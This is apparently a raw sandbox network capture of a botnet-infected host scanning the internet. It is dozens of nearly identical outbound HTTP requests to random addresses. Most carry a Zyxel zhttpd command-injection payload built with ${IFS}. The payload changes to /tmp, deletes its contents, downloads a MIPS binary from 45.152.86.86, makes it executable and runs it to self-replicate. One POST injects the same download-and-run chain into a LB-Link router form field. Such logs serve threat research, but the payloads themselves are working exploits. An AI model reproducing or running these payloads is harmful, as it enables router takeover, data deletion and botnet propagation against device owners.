                              Mar 31, 2024 08:41:43.044492006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6088192.168.2.134612289.158.236.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044550896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6089192.168.2.1347276141.2.247.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044583082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6090192.168.2.1359060120.187.118.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044662952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6091192.168.2.1333850100.20.15.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044709921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6092192.168.2.1338276157.34.110.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044739008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6093192.168.2.1348356173.251.14.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044768095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6094192.168.2.133788299.103.153.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044807911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6095192.168.2.1343482204.37.75.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044874907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6096192.168.2.1353054223.72.19.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044951916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6097192.168.2.133687867.10.227.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045001030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6098192.168.2.134099427.13.232.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045042992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6099192.168.2.133369675.24.144.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045078993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6100192.168.2.134386264.49.86.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045109987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6101192.168.2.133512639.93.163.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045173883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6102192.168.2.13567624.38.57.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045228958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6103192.168.2.1333448141.24.7.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045290947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6104192.168.2.1359316164.141.140.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045346975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6105192.168.2.1352148189.176.42.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045388937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6106192.168.2.135351065.216.57.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045420885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6107192.168.2.134646891.93.116.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045453072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6108192.168.2.1334196222.79.55.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045495033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6109192.168.2.134877874.134.188.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045538902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6110192.168.2.1347778222.134.27.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045594931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6111192.168.2.134999689.105.35.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.045638084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6112192.168.2.135500414.70.150.28080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.718226910 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:41:44.006510019 CEST103INHTTP/1.1 404 Not Found
                              Content-Type: text/plain
                              Content-Length: 30
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination Port
                              6113192.168.2.1346326207.87.41.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.050709009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6114192.168.2.1336562105.248.21.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.050755978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6115192.168.2.134810898.124.91.134443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.050801992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6116192.168.2.1355682143.135.81.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.050823927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6117192.168.2.1356738181.153.206.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.050870895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6118192.168.2.1347458169.31.105.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.050909996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6119192.168.2.1334450174.59.15.45443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.050936937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6120192.168.2.1342356100.29.104.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.050971985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6121192.168.2.1349456141.20.158.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.051032066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6122192.168.2.1359968197.64.208.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.051058054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6123192.168.2.1359684218.117.55.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.051111937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6124192.168.2.1356864154.70.49.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.051141024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6125192.168.2.135839632.29.20.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.051208019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6126192.168.2.135718854.91.249.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.051244020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6127192.168.2.1357684109.234.137.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.051275015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6128192.168.2.134588248.191.139.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.051321983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6129192.168.2.1352766182.159.64.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.051373005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6130192.168.2.1340178118.192.52.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.051438093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6131192.168.2.134691672.40.168.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:44.051461935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6132192.168.2.135727014.227.121.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.066876888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6133192.168.2.1360606155.120.72.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.066947937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6134192.168.2.1356204160.20.68.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067028046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6135192.168.2.13436688.29.50.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067118883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6136192.168.2.135227280.190.250.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067182064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6137192.168.2.134859248.97.191.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067255020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6138192.168.2.1360438113.146.129.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067312956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6139192.168.2.1341854100.35.24.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067398071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6140192.168.2.1340618132.98.82.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067460060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6141192.168.2.1342616141.141.198.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067528009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6142192.168.2.135852823.199.155.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067615986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6143192.168.2.1340336171.252.23.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067650080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6144192.168.2.13395701.190.76.231443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067722082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6145192.168.2.1355212109.33.93.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067786932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6146192.168.2.134036035.113.180.139443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067867041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6147192.168.2.135413087.125.89.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.067959070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6148192.168.2.1353620106.190.224.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068005085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6149192.168.2.1349718130.31.1.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068069935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6150192.168.2.1353176198.103.26.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068139076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6151192.168.2.135943458.208.248.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068206072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6152192.168.2.1356242198.235.185.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068270922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6153192.168.2.135587054.20.34.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068340063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6154192.168.2.1351062144.159.209.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:45.068418026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6155192.168.2.1360142192.244.68.153443
